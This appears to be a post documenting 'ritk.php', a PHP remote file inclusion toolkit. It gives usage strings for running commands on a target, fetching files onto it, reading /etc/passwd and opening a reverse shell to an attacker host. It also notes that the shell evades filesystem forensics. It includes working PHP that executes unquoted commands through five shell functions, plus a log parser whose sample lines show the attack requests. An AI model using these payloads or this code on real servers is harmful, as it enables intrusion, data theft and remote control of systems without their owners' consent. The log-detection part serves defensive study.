ritk.php
(r)emote (i)nclusion (t)ool(k)it is a small PHP script I put together for use in
some remote inclusion auditing I was assigned to do. Surely there are numerous
scripts out there for similar usage, but I found many of them were badly coded,
or were just over-coded. I also never really got into PHP coding too much, so it
was a perfect opportunity to try it out. You can grab it
here, and the following is a
reference of its functionality:
features:
(every usage string below is appended to the URL of the included ritk.php, so
the parameters end up in the script's own query string)
1) "ft" (function test)
desc: a command execution test that tries each of the 5 execution methods
listed below and shows which of them work on the target.
usage: ?&ft=1
optional: append "&ftc=COMMAND" after the ft variable, replacing COMMAND with
the command to run. the default command is "id".
2) execute a command.
desc: execute a specific command through one chosen execution method.
usage: ?&meth=METHOD&ftc=COMMAND
replace "METHOD" with one of the execution methods listed below, and
"COMMAND" with the command to run.
3) remotely download and save a file to local disk.
desc: fetch a file over HTTP and write it to the given path on the target
(the web server's user needs write access to that path).
usage: ?&saveas=/tmp/test&grab=http://site.tld/path/file
4) src show
desc: if the PHP installation has safe_mode enabled (which restricts the
command execution functions), you can still fall back to reading files.
usage: ?&src=/etc/passwd
5) phpinfo
desc: sometimes you need to know some configuration details (safe_mode,
disable_functions, allow_url_fopen, socket support), and phpinfo() suits
that need.
usage: ?&pinfo=1
6) reverse shell
desc: on servers with PHP sockets enabled, this feature makes the target
connect back out to a host you control, which can bypass firewalls that
only filter incoming connections. this reverse shell function is also nice
because the PHP script is being included and executed remotely, so nothing
is written to the target's disk; a forensic investigation of the filesystem
won't turn up the reverse shell source. the web server's HTTP logs, however,
still record the inclusion request, callback host and port included, so
don't forget those, duh.
usage: ?&rvs=1&rvsto=attacker.host.tld&rvsp=port-number
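To make the HTTP log caveat above concrete, here is an added example (not part of ritk.php) that walks a few constructed Apache access-log lines and pulls out the inclusion requests. The log lines, the hostnames and the vulnerable "page" parameter of the target application are made up for this example, and rfi_indicators() and RITK_PARAMS are names chosen here; the parameter names inside RITK_PARAMS are the toolkit's own.

```php
<?php
// Added example, not part of ritk.php: what the target's web server keeps
// when the toolkit is included. The three access-log lines are constructed
// (Apache combined format, made-up hosts and a made-up vulnerable "page"
// parameter); rfi_indicators() and RITK_PARAMS are names assumed here.

$sample_log = <<<'LOG'
10.0.0.5 - - [12/Mar/2007:10:14:22 +0000] "GET /index.php?page=about HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2007:10:15:01 +0000] "GET /index.php?page=http://attacker.host.tld/ritk.php?&ft=1&ftc=id HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2007:10:16:40 +0000] "GET /index.php?page=http://attacker.host.tld/ritk.php?&rvs=1&rvsto=attacker.host.tld&rvsp=4444 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
LOG;

// Query parameters the toolkit documents (taken from its feature list).
const RITK_PARAMS = ['ft', 'ftc', 'meth', 'saveas', 'grab', 'src', 'pinfo', 'rvs', 'rvsto', 'rvsp'];

// Return one entry per request whose query string carries a remote URL,
// together with any toolkit parameters that travelled along with it.
function rfi_indicators(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $client = $m[1];
        $target = $m[2];
        $q = strpos($target, '?');
        if ($q === false) {
            continue;
        }
        // The included URL's own "?&ft=1..." tail is split on "&" exactly
        // like the target's parameters, so the toolkit options land here too.
        parse_str(substr($target, $q + 1), $params);
        $include = null;
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^(?:https?|ftp)://#i', $value)) {
                $include = [$name, rtrim($value, '?')];
                break;
            }
        }
        if ($include === null) {
            continue;
        }
        $tool = [];
        foreach (RITK_PARAMS as $name) {
            if (array_key_exists($name, $params)) {
                $tool[$name] = $params[$name];
            }
        }
        $hits[] = ['client' => $client, 'include' => $include, 'toolkit' => $tool];
    }
    return $hits;
}

foreach (rfi_indicators($sample_log) as $hit) {
    [$name, $url] = $hit['include'];
    echo "{$hit['client']} included {$url} through parameter '{$name}'";
    if ($hit['toolkit']) {
        echo ' with ' . http_build_query($hit['toolkit']);
    }
    echo "\n";
}
```

Run from the command line it prints two lines, one for the function test and one for the reverse shell request; the second carries rvsto and rvsp in clear. The "nothing on disk" property therefore only covers the script body: the callback host and port, the grab/saveas paths and every command passed in ftc are all recorded in the target's access log (and, for the include fetch itself, in the logs of the host serving ritk.php).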
execution methods:
1) system()
2) exec()
3) passthru()
4) shell_exec()
5) popen()
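As an added example (not the ritk.php source), here is a minimal implementation of the "ft" and "meth" features over the five execution methods listed above. It shows what the toolkit has to deal with: each function hands output back differently, and a function listed in disable_functions must be skipped rather than called. The function names run_via() and function_test() and the command-line fallback are assumptions made for this example; the parameter names ft, ftc and meth are the toolkit's own.

```php
<?php
// Added example, not the ritk.php source: the "ft" (function test) and
// "meth" features over the five execution methods the toolkit lists.
// run_via(), function_test() and the CLI fallback are assumptions made
// here; ft, ftc and meth are the toolkit's own parameter names.

// The five methods hand output back differently: system() and passthru()
// print it, exec() fills an array, shell_exec() returns a string and popen()
// returns a stream. Normalise all of them to a string, or null on failure.
function run_via(string $method, string $cmd): ?string
{
    switch ($method) {
        case 'system':
            ob_start();
            $last = system($cmd, $rc);
            $out = ob_get_clean();
            return $last === false ? null : $out;
        case 'exec':
            $lines = [];
            $last = exec($cmd, $lines, $rc);
            return $last === false ? null : implode("\n", $lines) . "\n";
        case 'passthru':
            ob_start();
            $r = passthru($cmd, $rc);
            $out = ob_get_clean();
            return $r === false ? null : $out;
        case 'shell_exec':
            $out = shell_exec($cmd);
            return is_string($out) ? $out : null;
        case 'popen':
            $h = popen($cmd, 'r');
            if ($h === false) {
                return null;
            }
            $out = stream_get_contents($h);
            pclose($h);
            return $out === false ? null : $out;
    }
    return null; // unknown method name
}

// Try every method with the same command and report what each gave back.
// Methods listed in disable_functions are skipped instead of called, since
// calling one raises a warning on PHP 7 and a fatal error on PHP 8.
function function_test(string $cmd = 'id'): array
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $report = [];
    foreach (['system', 'exec', 'passthru', 'shell_exec', 'popen'] as $m) {
        if (in_array($m, $disabled, true) || !function_exists($m)) {
            $report[$m] = 'disabled';
            continue;
        }
        $out = run_via($m, $cmd);
        $report[$m] = ($out === null || trim($out) === '') ? 'no output' : trim($out);
    }
    return $report;
}

// Parameter handling mirrors the toolkit's usage strings. When run from the
// command line (no $_GET), an "ft" run with an optional command argument is
// assumed so the script can be tried locally.
$p = PHP_SAPI === 'cli' ? ['ft' => '1', 'ftc' => $argv[1] ?? 'id'] : $_GET;
$cmd = isset($p['ftc']) ? (string) $p['ftc'] : 'id';

if (isset($p['ft'])) {
    foreach (function_test($cmd) as $m => $result) {
        echo str_pad($m . '()', 12) . ': ' . $result . "\n";
    }
} elseif (isset($p['meth'])) {
    $out = run_via((string) $p['meth'], $cmd);
    echo $out ?? "unknown method or execution failed\n";
}
```

On a hardened host every line of the report reads "disabled", which is exactly the situation feature 4 (src show) exists for. Note that ftc goes to the shell unquoted by design, so a hosted copy of a script like this should only be reachable for the duration of the engagement.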
there is much more to go.. :)